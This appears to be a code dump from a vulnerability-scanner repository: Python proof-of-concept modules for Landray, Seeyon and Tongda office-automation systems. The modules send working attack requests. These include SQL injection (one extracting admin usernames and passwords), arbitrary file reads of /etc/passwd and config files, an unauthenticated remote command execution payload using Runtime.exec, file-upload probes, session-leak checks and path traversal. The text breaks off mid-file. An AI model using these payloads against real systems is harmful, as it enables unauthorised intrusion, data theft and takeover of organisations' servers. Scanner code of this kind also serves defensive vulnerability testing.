https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landry-eis-ShowUserInfo-sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landry-eis-UniformEntry-sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landry-eis-UniformEntry-sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landry-eis-fl_define_flow_chart_show-sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landry-eis-fl_define_flow_chart_show-sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landry-eis-frm_form_list_main-sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landry-eis-frm_form_list_main-sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landry-eis-saveImg-fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landry-eis-saveImg-fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landry_oa_sysUiExtend_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landry_oa_sysUiExtend_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landray-eis-doc_fileedit_word-sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '蓝凌EIS智慧协同平台doc_fileedit_word.aspx接口SQL注入',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'Pragma': 'no-cache',
12 | 'Cache-Control': 'no-cache',
13 | 'Upgrade-Insecure-Requests': '1',
14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
15 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
16 | 'Accept-Encoding': 'gzip, deflate',
17 | 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
18 | 'Connection': 'close'
19 | }
20 | vurl = urllib.parse.urljoin(url, "/dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1")
21 | try:
22 | response = requests.get(vurl, headers=headers)
23 | if response.status_code == 500 and 'Microsoft' in response.text:
24 | relsult['vulnerable'] = True
25 | relsult['verify'] = vurl
26 | return relsult
27 |
28 | except:
29 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landray-eis-frm_button_func-sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '蓝凌EIS智慧协同平台frm_button_func.aspx接口SQL注入',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'Pragma': 'no-cache',
12 | 'Cache-Control': 'no-cache',
13 | 'Upgrade-Insecure-Requests': '1',
14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
15 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
16 | 'Accept-Encoding': 'gzip, deflate',
17 | 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
18 | 'Connection': 'close'
19 | }
20 | vurl = urllib.parse.urljoin(url, "/frm/frm_button_func.aspx?formid=1%20and%201=@@version--+")
21 | try:
22 | response = requests.get(vurl, headers=headers)
23 | if response.status_code == 500 and 'Microsoft' in response.text:
24 | relsult['vulnerable'] = True
25 | relsult['verify'] = vurl
26 | return relsult
27 |
28 | except:
29 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landray-eis-rpt_listreport_definefield-sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '蓝凌EIS智慧协同平台rpt_listreport_definefield.aspx接口存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0',
12 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
13 | 'Connection': 'Keep-Alive',
14 | 'Accept-Encoding': 'gzip, deflate',
15 | 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
16 | 'Upgrade-Insecure-Requests': '1'
17 | }
18 | vurl = urllib.parse.urljoin(url, "/SM/rpt_listreport_definefield.aspx?ID=2%20and%201=@@version--+")
19 | try:
20 | response = requests.get(vurl, headers=headers)
21 | if response.status_code == 500 and 'Microsoft' in response.text:
22 | relsult['vulnerable'] = True
23 | relsult['verify'] = vurl
24 | return relsult
25 |
26 | except:
27 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landray_oa_WechatLoginHelper_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '蓝凌OA-WechatLoginHelper.do存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.850.132 Safari/537.36',
12 | 'Connection': 'close',
13 | 'Content-Type': 'application/x-www-form-urlencoded',
14 | 'Accept-Encoding': 'gzip'
15 | }
16 | data = "method=edit&openid=&nickname=&image=&uid=123'and updatexml(1,concat('~',(select concat('~',test.fdLoginName,'~',test.fdPassword,'~') from com.landray.kmss.sys.organization.model.SysOrgPerson test where test.fdLoginName like '%25admin12%25'),'~'),1)=1-- '"
17 | vurl = urllib.parse.urljoin(url, "/third/wechat/wechatLoginHelper.do")
18 | try:
19 | response = requests.post(vurl, headers=headers)
20 | if response.status_code == 200 and 'nvarchar' in response.text:
21 | relsult['vulnerable'] = True
22 | relsult['verify'] = vurl
23 | return relsult
24 |
25 | except:
26 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landray_oa_admindo_jndiinject_2021.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import re
3 | import urllib
4 |
5 | def verify(url):
6 | result = {
7 | 'name': '蓝凌OA admin.do JNDI远程命令执行',
8 | 'vulnerable': False
9 | }
10 | payload_data = 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}'
11 | timeout = 3
12 | headers = {
13 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)',
14 | 'Content-type': 'application/x-www-form-urlencoded',
15 | }
16 | vurl = urllib.parse.urljoin(url, "/sys/ui/extend/varkind/custom.jsp")
17 | try:
18 | rep = requests.post(vurl, headers=headers, timeout=timeout, data=payload_data, verify=False)
19 | if rep.status_code == 200 and re.search('password', rep.text) and re.search("kmss\.properties\.encrypt\.enabled", rep.text):
20 | result['vulnerable'] = True
21 | return result
22 | except:
23 | return result
24 |
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landray_oa_custom_jsp_fileread.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib, re
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '蓝凌OA custom.jsp 任意文件读取漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | timeout = 3
11 | headers = {
12 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0',
13 | 'Content-Type': 'application/x-www-form-urlencoded',
14 | }
15 | vurl = urllib.parse.urljoin(url, '/sys/ui/extend/varkind/custom.jsp')
16 | data = 'var={"body":{"file":"file:///etc/passwd"}}'
17 | data2 = 'var={"body":{"file":"file:///c://windows/win.ini"}}'
18 | try:
19 | finger_rep = requests.get(vurl, headers=headers, verify=False, timeout=timeout, data=data)
20 | if re.search('/sys/ui/extend/', finger_rep.text) and finger_rep.status_code == 500:
21 | rep1 = requests.post(vurl, headers=headers, verify=False, timeout=timeout, data=data)
22 | rep2 = requests.post(vurl, headers=headers, verify=False, timeout=timeout, data=data2)
23 | if rep1.status_code == 200 and re.search('root:.*:0:0', rep1.text):
24 | relsult['vulnerable'] = True
25 | relsult['os'] = 'linux'
26 | relsult['vurl'] = vurl
27 | if rep2.status_code == 200 and re.search('for 16-bit app support', rep1.text):
28 | relsult['vulnerable'] = True
29 | relsult['os'] = 'windows'
30 | relsult['vurl'] = vurl
31 | return relsult
32 | except:
33 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landray_oa_treexml_rce_2022.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib, re
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '蓝凌OA 未授权RCE(2022HVV)',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | cmd = 'whoami'
11 | timeout = 5
12 | headers = {
13 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) ",
14 | 'Content-Type': 'application/x-www-form-urlencoded',
15 | }
16 | payload = '/data/sys-common/treexml.tmpl'
17 | vurl = urllib.parse.urljoin(url, payload)
18 | payload_data = '''s_bean=ruleFormulaValidate&script=try {
19 | String cmd = "%s";
20 | Process child = Runtime.getRuntime().exec(cmd);
21 | } catch (IOException e) {
22 | System.err.println(e);
23 | }''' % cmd
24 | try:
25 | finger_rep = requests.post(vurl, headers=headers, timeout=timeout, verify=False)
26 | if re.search('参数s_bean不能为空', finger_rep.text):
27 | rep = requests.post(vurl, headers=headers, timeout=timeout, verify=False, data=payload_data)
28 | if re.search('公式运行时返回了空值,所以无法校验返回值类型', rep.text) and rep.status_code == 200:
29 | relsult['vulnerable'] = True
30 | relsult['vurl'] = vurl
31 | return relsult
32 | except:
33 | return relsult
34 |
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landray_sysUiComponent_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '蓝凌OAsysUiComponent 文件存在任意文件上传漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Connection':'close'
13 | }
14 | vurl = urllib.parse.urljoin(url, "/sys/ui/sys_ui_component/sysUiComponent.do?method=upload")
15 | try:
16 | response = requests.get(vurl, headers=headers, timeout=5)
17 | if response.status_code == 200 and '部件包' in response.text:
18 | relsult['vulnerable'] = True
19 | relsult['verify'] = vurl
20 | return relsult
21 |
22 | except:
23 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landry-eis-ShowUserInfo-sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '蓝凌EIS智慧协同平台ShowUserInfo.aspx接口SQL注入',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'Pragma': 'no-cache',
12 | 'Cache-Control': 'no-cache',
13 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
14 | 'Accept': 'image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8',
15 | 'Accept-Encoding': 'gzip, deflate',
16 | 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
17 | 'Connection': 'close'
18 | }
19 | vurl = urllib.parse.urljoin(url, "/third/DingTalk/Demo/ShowUserInfo.aspx?account=1'%20and%201=@@version--+")
20 | try:
21 | response = requests.get(vurl, headers=headers)
22 | if response.status_code == 500 and 'Microsoft' in response.text:
23 | relsult['vulnerable'] = True
24 | relsult['verify'] = vurl
25 | return relsult
26 |
27 | except:
28 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landry-eis-UniformEntry-sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '蓝凌EIS智慧协同平台UniformEntry.aspx接口SQL注入',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
12 | 'Accept': 'image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8',
13 | 'Accept-Encoding': 'gzip, deflate',
14 | 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
15 | 'Connection': 'close'
16 | }
17 | vurl = urllib.parse.urljoin(url, "/third/DingTalk/Pages/UniformEntry.aspx?moduleid=1%20and%201=@@version--+")
18 | try:
19 | response = requests.get(vurl, headers=headers)
20 | if response.status_code == 500 and 'Microsoft' in response.text:
21 | relsult['vulnerable'] = True
22 | relsult['verify'] = vurl
23 | return relsult
24 |
25 | except:
26 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landry-eis-fl_define_flow_chart_show-sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '蓝凌EIS智慧协同平台fl_define_flow_chart_show.aspx接口SQL注入',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'Pragma': 'no-cache',
12 | 'Cache-Control': 'no-cache',
13 | 'Upgrade-Insecure-Requests': '1',
14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
15 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
16 | 'Accept-Encoding': 'gzip, deflate',
17 | 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
18 | 'Connection': 'close'
19 | }
20 | vurl = urllib.parse.urljoin(url, "/flow/fl_define_flow_chart_show.aspx?id=1%20and%201=@@version--+")
21 | try:
22 | response = requests.get(vurl, headers=headers)
23 | if response.status_code == 500 and 'Microsoft' in response.text:
24 | relsult['vulnerable'] = True
25 | relsult['verify'] = vurl
26 | return relsult
27 |
28 | except:
29 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landry-eis-frm_form_list_main-sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '蓝凌EIS智慧协同平台frm_form_list_main.aspx接口SQL注入',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'Pragma': 'no-cache',
12 | 'Cache-Control': 'no-cache',
13 | 'Upgrade-Insecure-Requests': '1',
14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
15 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
16 | 'Accept-Encoding': 'gzip, deflate',
17 | 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
18 | 'Connection': 'close'
19 | }
20 | vurl = urllib.parse.urljoin(url, "/frm/frm_form_list_main.aspx?list_id=1%20and%201=@@version--+")
21 | try:
22 | response = requests.get(vurl, headers=headers)
23 | if response.status_code == 500 and 'Microsoft' in response.text:
24 | relsult['vulnerable'] = True
25 | relsult['verify'] = vurl
26 | return relsult
27 |
28 | except:
29 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landry-eis-saveImg-fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36',
12 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
13 | 'Accept-Encoding': 'gzip, deflate',
14 | 'Accept-Language': 'zh-CN,zh;q=0.9',
15 | 'Connection': 'close',
16 | 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu'
17 | }
18 | data = '''------WebKitFormBoundaryxdgaqmqu
19 | Content-Disposition: form-data; name="file"filename="hello.txt"
20 | Content-Type: text/html
21 |
22 | hellohello
23 | ------WebKitFormBoundaryxdgaqmqu--'''
24 | vurl = urllib.parse.urljoin(url, "/eis/service/api.aspx?action=saveImg")
25 | try:
26 | response = requests.post(vurl, headers=headers, data=data)
27 | if response.status_code == 200 and 'editor_img' in response.text:
28 | relsult['vulnerable'] = True
29 | relsult['verify'] = vurl
30 | return relsult
31 |
32 | except:
33 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landry_oa_sysUiExtend_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '可能存在:蓝凌EKP sysUiExtend.do前台授权绕过导致文件上传',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Connection':'close'
13 | }
14 | vurl = urllib.parse.urljoin(url, "/api///sys/ui/sys_ui_extend/sysUiExtend.do?method=upload")
15 | try:
16 | response = requests.get(vurl, headers=headers)
17 | if response.status_code == 200 and '主题包' in response.text:
18 | relsult['vulnerable'] = True
19 | relsult['verify'] = vurl
20 | return relsult
21 |
22 | except:
23 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/seeyon/__pycache__/seeyon_a6_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/seeyon/__pycache__/seeyon_a6_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/seeyon/__pycache__/seeyon_get_sessionslist.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/seeyon/__pycache__/seeyon_get_sessionslist.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/seeyon/__pycache__/seeyon_oa_a8_htmlofficeservlet_getshell.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/seeyon/__pycache__/seeyon_oa_a8_htmlofficeservlet_getshell.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/seeyon/__pycache__/seeyon_oa_ajaxdo_fileupload_2022.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/seeyon/__pycache__/seeyon_oa_ajaxdo_fileupload_2022.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/seeyon/__pycache__/seeyon_oa_wpsassistservlet_fileupload_2022.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/seeyon/__pycache__/seeyon_oa_wpsassistservlet_fileupload_2022.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/seeyon/__pycache__/seeyon_thirdpartycontroller_getshell.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/seeyon/__pycache__/seeyon_thirdpartycontroller_getshell.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/seeyon/seeyon_a6_sqli.py:
--------------------------------------------------------------------------------
1 | import re, requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '致远OA A6 sql注入漏洞',
7 | 'vulnerable': False
8 | }
9 | payloads = [
10 | '/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20UnIoN%20SeLeCt%201,2,md5(1234),1%23',
11 | '/common/js/menu/test.jsp?doType=101&S1=SeLeCt%20Md5(1234)',
12 | '/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2%27AnD%20(SeLeCt%201%20FrOm%20(SeLeCt%20CoUnT(*),CoNcaT(Md5(1234),FlOoR(RaNd(0)*2))x%20FrOm%20InFoRmAtIoN_ScHeMa.TaBlEs%20GrOuP%20By%20x)a)%23',
13 | "/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=-1'UnIoN%20AlL%20SeLeCt%20NULL,Md5(1234),NULL,NULL%23",
14 | '/ext/trafaxserver/SendFax/resend.jsp?fax_ids=(1)%20AnD%201=2%20UnIon%20SeLeCt%20Md5(1234)%20--',
15 | ]
16 | try:
17 | for payload in payloads:
18 | try:
19 | vurl = urllib.parse.urljoin(url, payload)
20 | req = requests.get(vurl, timeout=2)
21 | if re.search('81dc9bdb52d04dc20036dbd8313ed055', req.text) or re.search('52d04dc20036dbd8', req.text):
22 | relsult['vulnerable'] = True
23 | relsult['url'] = url
24 | relsult['payload'] = vurl
25 | return relsult
26 | except:
27 | continue
28 | return relsult
29 | except:
30 | return relsult
31 |
32 |
--------------------------------------------------------------------------------
/pocs/web/OA/seeyon/seeyon_get_sessionslist.py:
--------------------------------------------------------------------------------
1 | import requests,re
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '致远OA Session泄漏漏洞(后台可getshell)',
7 | 'url': url,
8 | 'vulnerable': False
9 | }
10 | timeout = 3
11 | headers = {
12 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
13 | }
14 | payload = '/yyoa/ext/https/getSessionList.jsp?cmd=getAll'
15 | vurl = urllib.parse.urljoin(url, payload)
16 | try:
17 | req = requests.get(vurl, headers=headers, timeout=timeout)
18 | if req.status_code == 200 and re.search('[0-9A-Z]{32}', req.text):
19 | relsult['vulnerable'] = True
20 | relsult['vurl'] = vurl
21 | return relsult
22 | except:
23 | return relsult
24 |
25 |
--------------------------------------------------------------------------------
/pocs/web/OA/seeyon/seeyon_oa_a8_htmlofficeservlet_getshell.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import re
3 | import urllib
4 |
5 |
6 | def verify(url):
7 | relsult = {
8 | 'name': '致远 OA A8 htmlofficeservlet getshell 漏洞',
9 | 'vulnerable': False
10 | }
11 | payload = '/seeyon/htmlofficeservlet'
12 | try:
13 | vurl = urllib.parse.urljoin(url, payload)
14 | req = requests.get(vurl, timeout=3)
15 | if re.search('DBSTEP', req.text) and re.search('htmoffice', req.text):
16 | relsult['vulnerable'] = True
17 | relsult['url'] = url
18 | relsult['payload'] = vurl
19 | return relsult
20 | except:
21 | return relsult
22 |
23 |
--------------------------------------------------------------------------------
/pocs/web/OA/seeyon/seeyon_thirdpartycontroller_getshell.py:
--------------------------------------------------------------------------------
1 | import requests,re
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '致远OA Session泄露(thirdpartyController.do)',
7 | 'url': url,
8 | 'vulnerable': False
9 | }
10 | timeout = 3
11 | headers = {
12 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
13 | }
14 | payload = '/seeyon/thirdpartyController.do'
15 | data = 'method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1'
16 | vurl = urllib.parse.urljoin(url, payload)
17 | try:
18 | req = requests.post(vurl, headers=headers, timeout=timeout, data=data, verify=False)
19 | if req.status_code == 200 and re.search('seeyon', req.headers['Set-Cookie']) and re.search('JSESSIONID', req.headers['Set-Cookie']):
20 | relsult['vulnerable'] = True
21 | relsult['vurl'] = vurl
22 | return relsult
23 | except:
24 | return relsult
25 |
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/__pycache__/tongda_down_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/tongda/__pycache__/tongda_down_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/__pycache__/tongda_getdata_rce.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/tongda/__pycache__/tongda_getdata_rce.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/__pycache__/tongda_oa_2016_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/tongda/__pycache__/tongda_oa_2016_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/__pycache__/tongda_oa_fake_user.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/tongda/__pycache__/tongda_oa_fake_user.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/__pycache__/tongda_oa_fileinclude_2020.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/tongda/__pycache__/tongda_oa_fileinclude_2020.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/__pycache__/tongda_oa_qyapp-vote-submit_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/tongda/__pycache__/tongda_oa_qyapp-vote-submit_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/__pycache__/tongda_oa_v11-8_apialiphp_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/tongda/__pycache__/tongda_oa_v11-8_apialiphp_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/__pycache__/tongda_sqli_getdata_php.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/tongda/__pycache__/tongda_sqli_getdata_php.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/__pycache__/tongda_videofile_fileread.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/tongda/__pycache__/tongda_videofile_fileread.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/tongda_down_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '通达OA down.php接口存在未授权访问漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
12 | 'Accept': '*/*',
13 | 'Connection': 'Keep-Alive'
14 | }
15 |
16 | vurl = urllib.parse.urljoin(url, "/inc/package/down.php?id=../../../cache/org")
17 | try:
18 | response = requests.get(vurl, headers=headers, timeout=5)
19 | Content_length = int(response.headers.get('Content-Length', 0))
